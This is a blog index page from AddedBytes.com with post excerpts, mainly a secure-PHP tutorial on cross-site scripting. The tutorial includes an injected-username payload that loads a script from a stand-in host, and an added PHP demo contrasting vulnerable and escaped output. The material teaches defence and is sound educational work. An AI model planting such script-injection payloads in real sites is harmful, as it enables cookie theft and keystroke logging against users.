AddedBytes.com
AddedBytes.com, formerly ILoveJackDaniels.com, is the online playground of Dave Child, an ecommerce manager and web developer from Brighton, on the south coast of the UK.
- Blogging in Business (November 14)
When I started at Active Parity, one of the first things I wanted to do was help the company to get a blog started. They're a great way to show off your knowledge and communicate with clients. My first post over on the new blog is up, and it's on exactly that subject: Blogging in Business - specifically, why businesses should blog and what the potential downsides are. The first of many posts over there, I'm sure!
- Writing Secure PHP, Part 4 (September 11)
In Writing Secure PHP, Writing Secure PHP, Part 2 and Writing Secure PHP, Part 3 I covered many of the common mistakes PHP developers make and how to avoid the security problems they cause. This article covers some of the more advanced security problems common to PHP applications on the web.
[Writing Secure PHP is a series. Part 1, Part 2 and Part 3 are currently also available.]
Cross-Site Scripting (XSS)
Cross-site scripting (often abbreviated to XSS) is a form of injection, where an attacker finds a way to have the target site deliver markup or script they control to other users, so that it runs in those users' browsers with the target site's origin. In its most basic form, this can be as simple as a site that allows unescaped HTML characters in usernames, where someone can specify a username like:
- DaveChild<script type="text/javascript" src="http://www.example.com/my_script.js"></script>
Now, whenever someone views a page that displays my username on the target site, the script I've embedded in it will run in their browser. I could potentially use this to steal their session cookie or login details, log their keystrokes - any number of nefarious activities.
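The following is an added example, not code from the article, showing the username injection above in a minimal PHP page together with the fix: encode every untrusted value with htmlspecialchars() at the point it is written into HTML, and, as defence in depth, reject usernames that contain anything beyond an allowlist at registration time. The function names, the allowlist pattern and the profile markup are assumptions made for this example.

```php
<?php
// Added example, not code from the original article. Demonstrates the
// username-based XSS described above and the output-encoding fix.

declare(strict_types=1);

// Constructed attacker-controlled username: the payload from the article.
const ATTACKER_USERNAME = 'DaveChild<script type="text/javascript" src="http://www.example.com/my_script.js"></script>';

/**
 * Vulnerable: the username is concatenated into the HTML unchanged, so any
 * markup inside it becomes part of the page for every visitor who sees it.
 */
function render_profile_vulnerable(string $username): string
{
    return "<p>Profile of " . $username . "</p>\n";
}

/**
 * Encode a value for an HTML text or attribute context. ENT_QUOTES escapes
 * both ' and ", which matters when the value lands inside an attribute;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Hardened: every untrusted value is encoded for the context it is written
 * into. The text node and the title attribute use HTML encoding; the URL path
 * segment uses URL encoding, because HTML encoding is the wrong escape there.
 */
function render_profile_safe(string $username): string
{
    return "<p>Profile of " . e($username) . "</p>\n"
         . '<a href="/users/' . rawurlencode($username) . '" title="' . e($username) . '">'
         . e($username) . "</a>\n";
}

/**
 * Defence in depth: reject usernames outside a small allowlist when the
 * account is created. The pattern is an assumed policy for this example.
 * Validation does not replace output encoding; it only narrows what can
 * reach the output layer.
 */
function is_valid_username(string $username): bool
{
    return preg_match('/^[A-Za-z0-9_]{3,20}$/', $username) === 1;
}

// Run from the command line: php xss_demo.php
echo "--- vulnerable output (script tag is emitted as live markup) ---\n";
echo render_profile_vulnerable(ATTACKER_USERNAME);

echo "--- safe output (script tag is emitted as visible text) ---\n";
echo render_profile_safe(ATTACKER_USERNAME);

echo "--- registration check ---\n";
var_dump(is_valid_username('DaveChild'));
var_dump(is_valid_username(ATTACKER_USERNAME));
```

The point to carry away is that the encoding must match the context: htmlspecialchars() is right for text nodes and quoted attributes, rawurlencode() for a URL path segment, and neither is enough if the value is placed inside an inline script block or an unquoted attribute.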
As a d
- XSS Alarm Userscript (September 11)
Cross-Site Scripting (also known as XSS) is a security concern for any site that allows user input, especially e-commerce stores and anyone using or collecting sensitive personal information. In very basic terms, XSS is when a third party manages to have the target site load, and show to a user, a script or iframe that the third party controls. It allows the attacker to steal cookies, log keystrokes and more.
Unfortunately, while as a developer there is plenty you can do to make your web application secure against XSS, as a customer/user there is very little you can do to keep yourself safe. All you can really do is make sure you don't give out personal details or buy online from anywhere but the most reputable stores. And maybe watch your browser's "loading" bar like a hawk. Or maybe sniff your own HTTP traffic.
No browsers (that I know of) provide any method of preventing third-party scripts or iframes from loading. Let's face it - as long as advertising exists, that's unlikely to change. You can turn all JavaScript off, but that doesn't protect you against iframe-based XSS, and obviously degrades (for the most part) your web experience.
What I wanted was something to warn me when my browser was loading scripts from a third party. (Actually, what I really wanted was something to allow me to decide whether to load them or not.) Once a script from a third party has loaded, it may be too late to do anything - personal information may have already been taken - howe
- Personal Development: To Do (August 21)
On Hacker News, ambition posted a to-do list inspired by / taken from this excellent bit of advice from Chris Wanstrath. Which got me thinking about what I want to work on and with in my spare time.
I've been meaning to organise my side-projects better. Like everyone else, I have lots of ideas and little time to make anything of them. I have a folder packed with projects at 95% completion, sitting there unloved because I got distracted, or found something better to use.
The problem with that is that taking projects to 95% is ultimately demotivating. It breeds guilt, and that's not helpful. And a project at 95% doesn't pay you back for the time you put in to it. You eventually need to release something if you don't want to end up looking back and seeing missed opportunities and wasted time.
In addition to a collection of projects on the go and ideas, there are technical skills I want to develop. I'm learning Python, and Linux server administration. I'm interested in looking into Objective-C and Cocoa. jQuery is great but I need more time with it. My "Dave! Play with PostgreSQL!" post-it has faded, it's been on my wall for so long. And I need to stay sharp with the languages and technologies I use day-to-day.
Some fat needs to be trimmed.
I need to leave time for new things, too. Stuff I've not heard of
- Subversion Cheat Sheet (August 7)
Overview
The Subversion (SVN) cheat sheet is a one-page reference sheet for Subversion on the command line. If you like the cheat sheets, and want to say thanks, please consider buying me something from my Amazon Wishlist. Thank you very much to those who have already hunted it down and sent me something - I'm very grateful!
Much of the content on this cheat sheet is based on the excellent SVN Book, available at http://svnbook.red-bean.com/. This is the first cheat sheet created with the involvement of the Cheat Sheets Google Group. Many thanks to Alan Switzer and Randy Merrill for their suggestions and feedback. Finally, thanks also to the 210 people who requested this cheat sheet!
Downloads